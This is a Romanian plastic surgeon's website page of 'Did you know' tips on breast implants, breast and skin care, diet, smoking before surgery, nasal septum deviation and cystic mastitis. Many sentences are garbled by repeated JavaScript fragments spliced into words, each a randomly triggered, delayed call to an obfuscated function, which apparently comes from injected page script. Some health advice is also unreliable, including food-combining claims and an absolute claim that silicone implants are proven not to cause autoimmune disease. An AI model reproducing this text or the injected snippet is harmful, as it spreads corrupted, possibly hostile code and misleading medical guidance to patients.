surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Stiati ca…

Stiati ca…

Dusurile fierbinti nu sunt indicate pentru sani? Apa prea calda slabeste tesutul conjunctiv, asa ca trebuie alternata cu apa rece, atat cat poti suporta fara un disconfort maajor. In special dupa o interventie de implant mamar si mai ales in perioada de maturizare este foarte indicat sa evitati baia fierbinte pe sani. Apa la temperatura corpului si miscari circulare cu dusul reprezinta combinatia perfecta. Din candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and in candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and, un gomaj delicat este benefic.

Stiati ca…

Sutienele sunt benefice sanilor, insa numai atunci candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and sunt sunt bine alese? Scopul acestora este de a sustine partea inferioara a sanului, respectiv sa impiedice sau sa diminueze procesul de autoprabusire a sanului sub propria lui greutate. De asemenea, sutienele ajuta in cazul sanilor pentru slabiti sau, in cazul implantelor mamare, ajuta la prevennirea rotatiei implantului. Un sutien trebuie sa fie comod si sa acopere sanii, astfel incat sa ii sustina, bretelele nu au voie sa stranga umerii si nici bareta din spate nu trebuie sa se ridice. Purtarea unui sutien nepotrivit poate cauza dureri de spate sau de sani.

Stiati ca…

Ca razele UV sunt foarte periculoase pentru piele si cu atat mai mult pentru decolteu, zona cu piele foarte sensibila? Este de inteles placerea sociala de a fi bronzati astfel incat in fata unui rau, trebuie aleasa solutia cea mai putin daunatoare. Asadar, daca nu poti renunta la aceasta placere, aplica pe sani o crema cu un factor de protectie cat mai mare, poate chiar produsul folosit pentru fata atunci candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and te expui la soare. Important de retinut pentru persoanele cu implant, expunerea la soare poate creste expenomential riscul de pigmentare a cictricelor. Inca un detaliu – daca tineti la sanatatea voastra, ar trebui sa evitati „bronzarea” la solar.

Stiati ca…

In momentele de mare efort fizic, pudra de copii poate fi folosita unde se aseaza piele pe piele, precum subrat, coapse interne si chiar sub sani, mai ales daca acestia sunt mari? Pudra previne acumularea de bacterii sau ciuperci dar mai ales iritatiile. Evitati evitati pe cat posibil folosirea diverselor produce cosmetice (deodorant in exces, parfum, fond de ten samd) inaintea orelor de sport.

Stiati ca…

Este mai bine ca atunci candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and iti alegi produsele se ingrijire sa fie din aceeasi gama? Acestea sunt concepute pentru a face “echipa” si a actiona impreuna pentru un rezultat total cat mai bun. De asemenea, atunci candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and vine vorba de produse de ingrijire externa, este bine sa stai departe de acelea care au mult parfum? Acestea, in special atunci candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and este soare puternic, pot sa aiba un efect de incarcare a porilor sau chiar sa produca iritatii.

Stiati ca…

Sanii sunt alcatuiti in mare parte din tesut adipos? Daca slabesti brusc, acestia vor parea “lasati”, iar daca te ingrasi rapid exista riscul ca pe acestia sa apara vergeturi. Consuma zilnic multa apa plata si alimente bogate in vitamina E si C pentru a mentine elasticitatea pielii. Sfatul meu: dorinta de slabire este de inteles dar trebuie efecuta stiintific, cu respectarea regulilor. Infometarea, regimul drastic + efectul yo yo duc la pierderea siluetei la femei, caderea ireversibila a sanilor; aceste sfaturi sunt valabile mai ales pentru femeile cu operatii la nivel de san, implant, lifting sau amandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andoua; in cazul acestor persoane, mentinerea greutatii este cheia unui rezultat bun in timp.

Stiati ca…

Ca un stil de viata naturist, corect, poate avea efecte benefice rapide aspura sanatatii si a frumusetii voastre, a pielii in special? Consumati multa apa – este esentiala pentru a avea o piele hidratata si pentru a elimina toxinele prin intermediul rinichilor si al colonului. Asigurati-va ca dieta dumneavoastra contine o cantitate suficienta de antioxidanti – acestia ajuta la incetinirea procesului de imbatranire celulara. Fructele si legumele proaspete reprezinta cea mai buna sursa de antioxidanti naturali.

Asociati corect alimentele – consumandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and proteinele si carbohidratii la mese diferite veti preveni procesul nedorit al fermentatiei din colon si veti mari absorbtia substantelor nutritive in sange.

Evitati consumul de cafea si alcool in exces, acestea ducandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and la eliminarea lichidelor, respectiv la deshidratare prin pierderea umiditatii din organism.

Reduceti consumul de alimente care ingreuneaza organismul: cele mai rele sunt carnea rosie, produsele lactate, alimentele rafinate si cele prajite.

Sfatul meu: echilibru in alimentatie = silueta echilibrata!

Stiati ca…

Expunerea la soare fara sutien poate fi un pericol? Nu din motive de morala ci din punct de vedere dermatologic. Expunerea cu sanii dezgoliti la soare risca sa aiba o piele imbatranita prematur, din cauza razelor ultraviolete, care distrug tesuturile. De aceea trebuie sa folosesti intotdeauna creme cu factor de protectie UV mare dar mai ales sa va expuneti decent ca timp si mai ales ca program orar. Plaja la pranz = decolteu distrus!

Stiati ca…

Multi chirurgi plasticieni refuza sa-i opereze pe pacientii care fumeaza foarte mult? Deoarece cantitatea de oxigen din sangele lor este foarte mica, riscul aparitiei unei complicatii pe masa de operatii este foarte mare. Si pastile, mai ales cele pentru slabit sunt periculoase in contextul unei astfel de interventii, pentru ca schimba semnificativ felul in care corpul reactioneaza la anestezie, ele continandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and substante care ridica tensiunea. In conditiile acestea, niciun medic nu va risca sa faca o interventie unei persoane in cazul careia ar putea sa apara probleme cardiace. Fii asadar sincera cu chirurgul tau caci tu esti cel /cea care va trebui sa suporte posibilele complicatii dupa anestezie.

Stiati ca…

Boala autoimuna este un termen general pentru a descrie un sistem imunitar care raspunde defensiv la substante care fac parte din propriul organism? Aceste probleme apar din nefericire spontan, la populatia obisnuita. Teoria ca siliconul ar putea cauza boala autoimuna este gresita si a fost dovedit prin numeroase teste facute pe grupuri de femei cu implanturi. Studiile clinice au demonstrat ca nu exista nicio legatura intre implanturile de silicon si dereglarile de tesut. Exista studii ce continua sa verifice aceste rezultate pe un grup mare de femei, in timp mai indelungat.

Stiati ca…

Nicio femeie nu are sanii perfect egali ca dimensiune, iar cel stang este de obicei putin mai mare? Inclusiv forma poate fi usor diferita iar aceste diferente pot sau nu fi observate cu ochiul liber. Nu se stie inca ce provoaca aceasta asimetrie. Cert este ca rezulatul vizitei la medicul estetician trebuie sa defineasca care sunt limitele, respectiv ce se poate si ce nu se poate realiza printr-o operatie estetica, raportat la criteriile si asteptarile pacientei. Un exemplu este aceasta asimetrie, ce nu poate fi niciodata perfect echilibrata in urma unei operatii. Bineinteles, de la caz la caz, aceasta poate fi mult imunatatita.

Stiati ca…

Nicio femeie nu are sanii perfect egali ca dimensiune, iar cel stang este de obicei putin mai mare? Inclusiv forma poate fi usor diferita iar aceste diferente pot sau nu fi observate cu ochiul liber. Nu se stie inca ce provoaca aceasta asimetrie. Cert este ca rezulatul vizitei la medicul estetician trebuie sa defineasca care sunt limitele, respectiv ce se poate si ce nu se poate realiza printr-o operatie estetica, raportat la criteriile si asteptarile pacientei. Un exemplu este aceasta asimetrie, ce nu poate fi niciodata perfect echilibrata in urma unei operatii. Bineinteles, de la caz la caz, aceasta poate fi mult imunatatita.

Stiati ca…

Multe persoane se nasc cu deviatie de sept pentru ca septul nazal este deplasat intr-o parte, rezultandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and un pasaj nazal mai mic decat celalalt, ceea ce creaza disconfort si probleme de respiratie? Problemele respiratorii sunt deranjante si pot provoca chiar infectii ale sinusurilor, obstructia uneia sau a ambelor nari, sangerari nazale si respiratie zgomotoasa in timpul noptii. Aceste incoveniente pot fi rezolvate cu ajutorul interventiei de corectie de sept nazal sau reconstructie a septului nazal. Termenul de rinoplastie cuprinde fie numai modificarea estetica exterioara a nasului fie, in situatiile in care este necesar, interventia de corectie a septului. De multe ori, candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and septul este deviat, pentru un rezultat corect este nevoie si de modificarea exterioara a nasului – rinoplastie exterioara. Aceste aspecte se clarifica pe parcursul consultul preoperator.

Stiati ca…

Nu pretul este cel care defineste calitatea medicului potrivit? Nu te grabi sa apreciezi un chirurg ca fiind bun doar pentru ca practica preturi mari si nici nu te duce la cel care opereaza cel mai ieftin. Numai dupa consultatie poti aprecia daca medicul este cel potrivit, daca ai inteles corect riscurile si asteptarile interventiei. Nu pune un pret pe corpul tau!

Stiati ca…

Forma sub care apar frecvent nodulii la sani este mastoza chistica? Cu alte cuvinte, prezenta mai multor noduli inflamati si durerosi la ambii sani. Este important sa cunoasteti cateva informatii esentiale:

  • Mastoza chistica nu afecteaza alaptarea.

  • Este foarte important ca nodulii sa fie depistati din timp. In acest scop, lunar, dupa ciclu, trebuie sa ne palpam sanii.

  • Autopalparea se face in picioare sau in pozitie orizontala. Daca, spre exemplu, palpam sanul drept, atunci mana dreapta trebuie tinuta pe sold sau ridicata la ceafa.

  • Mastoza chistica prezinta un risc de cancer foarte scazut, pe candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and un nodul izolat este incomparabil mai periculos.

Legatura acestor afectiuni cu implantul mamar trebuie inteleasa corect – nu sub aspect de cauzalitate. Implantul mamar efectuat corect nu influenteaza in realitate in nicio directie – in rau sau in bine aceste afectiuni.

Dumneavoastra, ca purtatoare sau viitoare purtatoare de implant, trebuie sa va educati cu ajutorul chirurgului plastician invatandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and sa va palpati sanul cu implant. Desi nu influenteaza in sens negativ sanatatea sanului, implantul mamar poate influenta negativ descoperirea precoce a afectiunui benigne sau maligne. Cereti asadar medicului sa va explice in detaliu aceste informatii!

Suna Acum!
Navigheaza!